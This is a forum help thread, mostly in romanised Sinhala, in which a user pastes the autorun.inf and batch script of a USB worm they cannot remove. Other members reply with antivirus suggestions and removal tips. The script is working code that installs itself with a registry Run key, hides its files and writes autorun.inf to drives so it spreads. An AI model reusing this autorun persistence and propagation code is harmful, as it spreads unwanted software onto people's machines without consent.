Menna mehema Virus ekak

[supunpancha]

Menna mehema Virus ekak thiyenava Ain kara ganna baha, kaspersky valin scan kala ahu une naha, trojanremove eken remove kalath ayeth hadenava mokada karanne ... help me

autorun.inf eka
[autorun]
icon=%SystemRoot%\system32\SHELL32.dll,7
open=AutoClean\shh.bat
action=Virus Protection by Scarecrow(The Mick)
shell\open\command=AutoClean\shh.bat



Combokill.bat eka
@echo off
TITLE Virus Protection by Scarecrow(The Mick)
REM v4.03
REM 22 August 2008
REM kills New.exe/Scvhost.exe (BlueStar); Autorunme.exe/LSASS.exe (Recycler); Start.exe/Lsas.exe;

GOTO :CHECK0

REM Check Functions

:CHECK0
IF EXIST "C:\WINDOWS\pchealth\AutoClean\Patch\update004.bat" GOTO :UPDATESELF
GOTO :CHECK1

:CHECK1
IF EXIST "C:\WINDOWS\System\lsas.exe" GOTO :LSAS
GOTO :CHECK2

:CHECK2
IF EXIST "C:\Documents and Settings\%username%\lsass.exe" GOTO :LSASS
GOTO :CHECK3

:CHECK3
IF EXIST "C:\WINDOWS\Tasks\Scvhost.exe" GOTO :BLUESTAR
GOTO :CHECK4

:CHECK4
attrib -H -s -R "%~d0\*.*"
IF EXIST "%~d0\RECYCLER" GOTO :AUTORUNME
GOTO :CHECK5

:CHECK5
IF EXIST "%~d0\New.exe" GOTO :NEW
GOTO :CHECK6

:CHECK6
IF EXIST "%~d0\start.exe" GOTO :START
GOTO :CHECK7

:CHECK7
IF NOT EXIST "C:\WINDOWS\pchealth\AutoClean\AutoProtect.vbs" GOTO ROTECT
GOTO :CHECK8

:CHECK8
IF NOT EXIST "C:\WINDOWS\pchealth\AutoClean\Patch\update003.bat" GOTO :UPDATE
GOTO :END

REM Execution Functions

:UPDATESELF
xcopy "C:\Windows\pchealth\AutoClean\Patch\update004.bat" "%~d0\AutoClean\Patch\" /s/c/q/y/h/r/k/i
START /min "%~d0\AutoClean\Patch\update003.bat" /B
GOTO :END1

:LSAS
taskkill /f /im lsas.exe /t
attrib -R -s -H "C:\WINDOWS\System\lsas.exe" /S /D
del /F /Q "C:\WINDOWS\System\lsas.exe"
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Logistics" /f
GOTO :CHECK2

:LSASS
taskkill /f /FI "USERNAME eq %username%" /im lsass.exe /t
attrib -R -s -H "C:\Documents and Settings\%username%\*.*" /S /D
ECHO attrib -R -s -H "C:\Documents and Settings\Administrator\*.*" /S /D
ECHO del /F "C:\Documents and Settings\Administrator\lsass.exe"
del /F "C:\Documents and Settings\%username%\lsass.exe"
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "LSA Shellu" /f
GOTO :CHECK3

:BLUESTAR
taskkill /f /im scvhost.exe /t
taskkill /f /im new.exe /t
attrib -R -s -H "C:\WINDOWS\Tasks\*.*" /S /D
attrib -R -s -H "C:\WINDOWS\System\bs.pif"
attrib -R -s -H "C:\New.exe"
del /F /Q "C:\New.exe"
del /F /Q "C:\Windows\Tasks\Scvhost.exe"
del /F /Q "C:\WINDOWS\System\bs.pif"
reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Load" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar" /v "BackBitmapIE5" /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar" /v "BackBitmapShell" /f
GOTO :CHECK4

:AUTORUNME
attrib -R -s -H "%~d0\*.*" /S /D
del /F /Q "%~d0\autorun.inf"
del /F /Q "%~d0\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\Desktop.ini"
del /F /Q "%~d0\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213\Autorunme.exe"
rmdir /S /Q "%~d0\RECYCLER\S-1-6-21-2434476501-1644491937-600003330-1213"
rmdir /S /Q "%~d0\RECYCLER"
GOTO :CHECK5

:NEW
attrib -R -s -H "%~d0\*.*" /S /D
del /F /Q "%~d0\autorun.inf"
del /F /Q "%~d0\New.exe"
GOTO :CHECK6

:START
attrib -R -s -H "%~d0\*.*"
del /F "%~d0\autorun.inf"
del /F "%~d0\start.exe"
GOTO :CHECK7

ROTECT
xcopy "%~d0\AutoClean\*.*" "C:\WINDOWS\pchealth\AutoClean\" /s/c/q/y/h/r/k/i
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "AutoProtect" /d "C:\Windows\pchealth\AutoClean\AutoProtect.vbs" /f
attrib +H +s +R "C:\windows\pchealth\AutoClean\*.*" /s /d
attrib +H +s +R "C:\windows\pchealth\AutoClean" /s /d
START /min C:\windows\pchealth\AutoClean\call.bat /B
GOTO :END

:UPDATE
taskkill /f /im wscript.exe /t
taskkill /f /im wscript.exe /t
REM attrib -R -s -H "C:\Windows\pchealth\AutoClean\*.*" /s /d
xcopy "%~d0\AutoClean\*.*" "C:\WINDOWS\pchealth\AutoClean\" /s/c/q/y/h/r/k/i
attrib +R +s +H "C:\Windows\pchealth\AutoClean\*.*"
attrib +R +s +H "C:\Windows\pchealth\AutoClean"
attrib +R +s +H "C:\Windows\pchealth\AutoClean\Patch\*.*"
attrib +R +s +H "C:\Windows\pchealth\AutoClean\Patch"
START /min C:\windows\pchealth\AutoClean\call.bat /B
GOTO :END

:END
xcopy "%~d0\AutoClean\autorun.inf" "%~d0\" /s/c/q/y/h/r/k/i
attrib +H +s +R "%~d0\AutoClean\*.*"
attrib +R +s +H "%~d0\AutoClean"
attrib +R +s +H "%~d0\AutoClean\Patch\*.*"
attrib +R +s +H "%~d0\AutoClean\Patch"
attrib +H +s +R "%~d0\autorun.inf"
attrib +H +s +R "%~d0\combokill.bat"
call explorer.exe %~d0
EXIT

:END1
call explorer.exe %~d0
EXIT



help me...............

 

[AL1717]

DOs Walin Ewilla Makana (DELETE) Balanna.....

 

[supunpancha]

vena vidiyak naddooooooo

 

[DragonD]

That's why i recommended AVAST PRO !

 

[dhanusha83]

need to check machan,,,Meke sample ekak Upload karapan kaspa hari bit diffender hari lab walata

 

[bathiya8510]

avg eka dala balanna. 70% withara remove karanna puluwan. mama check karala thiyenne.

 

[niroshan84515]

use avira primium

 

[ashen imalka]

use esset........

 

[Knight_Black]

That's why i recommended AVAST PRO !

 

[Wali Kukula]

 

[Knight_Black]

Avast use karahan eken machan Boot weddima scan karanawa e hinda patta

 

[Raveensach]

mage eketh thiyanawa...mokada karanne??
kaspersky walata ahuwenne ne!!!!!!!!

 

[somadasa]

avira free edition eken sure ekatama yai!

 

[Malinga]

mage eketh thiyanawa...mokada karanne??
kaspersky walata ahuwenne ne!!!!!!!!

e eka virus file ekak oya site ekata upload karala balanna mona virus guard ekata da ahuvenne kiyala.

http://www.virustotal.com/

ehema virus guard ekakin ain karaganna barinum ooka manual ain karaganna puluvan. eekata ithin virus eka hoyala makanna oona. thava virus eka run karana registry key makannath oona. eeta amatharava system eke karala thiyana venas kam aaith navatha thibuna vidiyata hadanna ona.

 

[akilar25]

USE ESET SMART SECURITY 4 OR NORTON INTERNET SECURITY 2009.

OYA DEKEN SURE EKATA OKA ALLANAWA.TELLING BY EXPERIENCE

 

[Y2K]

Use Combofix

 

[anu rangana]

new

macan avira vairas gahad aka dwonlod karala macin akata insol
karala pull scan parak dipan atakota hariyai ok

 

[Computer1st]

Safe mode gihillla hard eka kelinma open karan nethuwa right click karala explorer gihin delete karanna wenawa.

 

[poorna virajith]

 

[ishur_j]

Virus eka allala jam bothaleka dagena tiyaganin..